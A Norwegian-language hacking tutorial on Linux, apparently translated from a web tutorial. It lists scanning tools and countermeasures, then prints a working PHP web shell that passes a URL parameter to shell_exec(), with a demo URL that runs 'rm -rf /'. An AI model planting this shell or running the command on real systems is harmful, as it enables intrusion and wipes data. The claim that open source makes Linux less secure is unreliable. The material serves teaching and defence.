Hacking Linux OS: Hacking med Ubuntu (Kommandoopplæring)
Linux er det mest brukte serveroperativsystemet, spesielt for webservere. Det er åpen kildekode; dette betyr at alle kan ha tilgang til kildekoden. Dette gjør det mindre sikkert sammenlignet med andre operativsystemer ettersom angripere kan studere kildekoden for å finne sårbarheter. Linux for Hackers handler om å utnytte disse sårbarhetene for å få uautorisert tilgang til et system.
I denne artikkelen vil vi introdusere deg til hva Linux er, dets sikkerhetssårbarheter, hacking med Ubuntu og mottiltakene du kan sette i verk.
Rask notat om Linux
Linux er et operativsystem med åpen kildekode. Det er mange distribusjoner av Linux-baserte operativsystemer som Redhat, Fedora og Ubuntu, osv. I motsetning til andre operativsystemer er Linux mindre sikkert når det kommer til sikkerhet. Dette er fordi kildekoden er fritt tilgjengelig, så det er enkelt å studere den for sårbarheter og utnytte dem sammenlignet med andre operativsystemer som ikke er åpen kildekode. Linux kan brukes som et server-, skrivebords-, nettbrett- eller mobiloperativsystem.
Linux-programmer kan betjenes ved hjelp av enten GUI eller kommandoer. Linux-kommandoene for Kali Linux hacking er mer effektive og effektive sammenlignet med bruk av GUI. Av denne grunn hjelper det å kjenne grunnleggende Linux-kommandoer for hacking.
Se disse veiledningene https://www.guru99.com/unix-linux-tutorial.html om hvordan komme i gang med Kali Linux hacks.
Linux Hacking Tools
- Nessus– dette verktøyet kan brukes til Ubuntu hack, skannekonfigurasjonsinnstillinger, patcher og nettverk etc. finner du på https://www.tenable.com/products/nessus
- NMap. Dette verktøyet kan brukes til å overvåke verter som kjører på serveren og tjenestene de bruker. Den kan også brukes til å skanne etter porter. Den finner du på https://nmap.org/
- SARA – SARA er forkortelsen for Security Auditor's Research Assistant. Som navnet tilsier kan dette verktøyet brukes til å revidere nettverk mot trusler som f.eks SQL Injection, XSS etc. finner du på http://www-arc.com/sara/sara.html
Listen ovenfor er ikke uttømmende; det gir deg en ide om verktøyene som er tilgjengelige for Ubuntu hacking og hacking av Linux-systemer.
Hvordan forhindre Linux-hack
Linux Hacking utnytter sårbarhetene i operativsystemet. En organisasjon kan vedta følgende retningslinjer for å beskytte seg mot slike angrep.
- Patchhåndtering– patcher fikser feil som angripere utnytter for å kompromittere et system. En god oppdateringspolicy vil sikre at du hele tiden bruker relevante oppdateringer på systemet ditt.
- Riktig OS-konfigurasjon– andre utnyttelser utnytter svakhetene i konfigurasjonen av serveren. Inaktive brukernavn og demoner bør deaktiveres. Standardinnstillinger som vanlige passord til applikasjoner, standard brukernavn og noen portnumre bør endres.
- Inntrengingsdeteksjonssystem– slike verktøy kan brukes til å oppdage uautorisert tilgang til systemet. Noen verktøy har muligheten til å oppdage og forhindre slike angrep.
Hacking-aktivitet: Hack a Ubuntu Linux-system som bruker PHP
I dette praktiske scenariet vil vi lære å hacke med Ubuntu og vi vil gi deg grunnleggende informasjon om hvordan du kan bruke PHP å kompromittere en Linux. Vi kommer ikke til å målrette noe offer. Hvis du vil prøve det, kan du installere LAMPP på din lokale maskin.
PHP kommer med to funksjoner som kan brukes til å utføre Linux-hacking-kommandoer. Den har exec() og shell_exec() funksjoner. Funksjonen exec() returnerer den siste linjen i kommandoutgangen mens shell_exec() returnerer hele resultatet av kommandoen som en streng.
For demonstrasjonsformål, la oss anta at angriperlederne laster opp følgende fil til en webserver.
<?php $cmd = isset($_GET['cmd']) ? $_GET['cmd'] : 'ls -l'; echo "executing shell command:-> $cmd</br>"; $output = shell_exec($cmd); echo "<pre>$output</pre>"; ?>
HER,
Skriptet ovenfor henter kommandoen fra GET-variabelen kalt cmd. Kommandoen utføres ved hjelp av shell_exec() og resultatene returneres i nettleseren.
Koden ovenfor kan utnyttes ved hjelp av følgende URL
http://localhost/cp/konsole.php?cmd=ls%20-l
HER,
- “…konsole.php?cmd=ls%20-l”tildeler verdien ls –l til variabelen cmd.
Kommandoen i Ubuntu for hacking mot serveren vil bli utført som
shell_exec('ls -l') ;
Å kjøre koden ovenfor på en webserver gir resultater som ligner på følgende.
Kommandoen ovenfor viser ganske enkelt filene i gjeldende katalog og tillatelsene
La oss anta at angriperen sender følgende kommando
rm -rf /
HER,
- "rm" fjerner filene
- "rf" gjør at rm-kommandoen kjøres i en rekursiv modus. Sletter alle mapper og filer
- "/" instruerer kommandoen om å begynne å slette filer fra rotkatalogen
Angrepet URL ville sett omtrent slik ut
http://localhost/cp/konsole.php?cmd=rm%20-rf%20/
Sammendrag
- Linux er et populært operativsystem for servere, stasjonære datamaskiner, nettbrett og mobile enheter.
- Linux er åpen kildekode, og kildekoden kan fås av alle. Dette gjør det enkelt å oppdage sårbarhetene. Det er et av de beste operativsystemene for hackere.
- Grunnleggende og nettverkshacking-kommandoer i Ubuntu er verdifulle for Linux-hackere.
- Sårbarheter er en svakhet som kan utnyttes til å kompromittere et system.
- En god sikkerhet kan bidra til å beskytte et system mot å bli kompromittert av en angriper.

